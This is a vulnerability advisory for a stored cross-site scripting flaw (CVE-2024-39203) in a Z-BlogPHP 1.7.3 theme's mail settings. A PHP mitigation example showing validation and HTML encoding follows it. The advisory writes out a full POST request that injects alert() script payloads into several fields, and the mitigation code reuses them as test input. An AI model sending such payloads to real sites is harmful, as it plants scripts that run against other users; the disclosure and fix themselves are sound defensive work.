[Suggested description]
A cross-site scripting (XSS) vulnerability in the Backend Theme
Management module of Z-BlogPHP v1.7.3 allows attackers to execute
arbitrary web scripts or HTML via a crafted payload.
[Affected Component]
Z-BlogPHP is an open-source, PHP-based blog system developed by Z-Blog.
In Z-BlogPHP 1.7.3, Backend Theme Management for the Tuoyuan Pure Theme has hundreds of stored XSS injection points.
[CVE ID]
CVE-2024-39203
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/zblogcn/zblogphp/releases/tag/v1.7.3-3230
[Affected Product Code Base]
Z-BlogPHP - <=1.7.3
[Attack Type]
Context-dependent
[CVE Impact Other]
XSS
[Attack Vectors]
POST http://localhost/zblogphp/zb_users/theme/tpure/main.php?act=mail HTTP/1.1
csrfToken=ba34555f34939327c8d05d964d18b4d5&PostMAILON=&SMTP_SSL=0&SMTP_HOST=smtp.163.com&SMTP_PORT=25&FROM_EMAIL=&SMTP_PASS="><ScRiPt>alert(6)</ScRiPt>&FROM_NAME="><ScRiPt>alert(7)</ScRiPt>&MAIL_TO="><ScRiPt>alert(5)</ScRiPt>&PostNEWARTICLEMAILSENDON=0"><ScRiPt>alert(4)</ScRiPt>&PostEDITARTICLEMAILSENDON=0"><ScRiPt>alert(3)</ScRiPt>&PostCMTMAILSENDON=0"><ScRiPt>alert(2)</ScRiPt>&PostREPLYMAILSENDON=0"><ScRiPt>alert(1)</ScRiPt>
[Reference]
http://z-blogphp.com
https://github.com/zblogcn/zblogphp/releases/tag/v1.7.3-3230
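
A sketch of the mitigation for the class of bug reported above, added here as an example and not taken from Z-BlogPHP or the theme: validate the settings on save and HTML-encode them when they are written back into form attributes. The field names come from the request above; the function names, the settings array and the assumption that the values are echoed into `value="..."` attributes (suggested by the `">` prefix of each payload) are hypothetical.

```php
<?php
// Added illustration; not code from Z-BlogPHP or the theme.
// Field names follow the reported request; function names are hypothetical.

// Encode a stored value for use inside a quoted HTML attribute.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Validate settings on save so that only the expected types are stored.
function sanitize_mail_settings(array $post): array
{
    $flag = static fn($v): int => ((string)$v === '1') ? 1 : 0;
    $email = static function ($v): string {
        $v = filter_var((string)$v, FILTER_VALIDATE_EMAIL);
        return $v === false ? '' : $v;
    };
    $port = filter_var($post['SMTP_PORT'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 65535]]);

    return [
        'SMTP_SSL'   => $flag($post['SMTP_SSL'] ?? 0),
        'SMTP_PORT'  => $port === false ? 25 : $port,
        'FROM_EMAIL' => $email($post['FROM_EMAIL'] ?? ''),
        'MAIL_TO'    => $email($post['MAIL_TO'] ?? ''),
        // Free text: stored as submitted, encoded at output time.
        'FROM_NAME'  => (string)($post['FROM_NAME'] ?? ''),
        'PostCMTMAILSENDON' => $flag($post['PostCMTMAILSENDON'] ?? 0),
    ];
}

// Constructed input mirroring the shape of the reported request.
$post = [
    'SMTP_PORT' => '25',
    'FROM_NAME' => '"><ScRiPt>alert(7)</ScRiPt>',
    'MAIL_TO'   => '"><ScRiPt>alert(5)</ScRiPt>',
    'PostCMTMAILSENDON' => '0"><ScRiPt>alert(2)</ScRiPt>',
];
$cfg = sanitize_mail_settings($post);

// Vulnerable pattern: the raw value closes the attribute and the tag.
echo '<input name="FROM_NAME" value="' . $post['FROM_NAME'] . '">' . "\n";
// Hardened pattern: the same value stays inside the attribute as text.
echo '<input name="FROM_NAME" value="' . attr($cfg['FROM_NAME']) . '">' . "\n";
echo '<input name="MAIL_TO" value="' . attr($cfg['MAIL_TO']) . '">' . "\n";
```

Typed validation rejects the payload outright in the flag and e-mail fields, while free-text fields such as `FROM_NAME` depend on the output encoding alone, so both steps are needed.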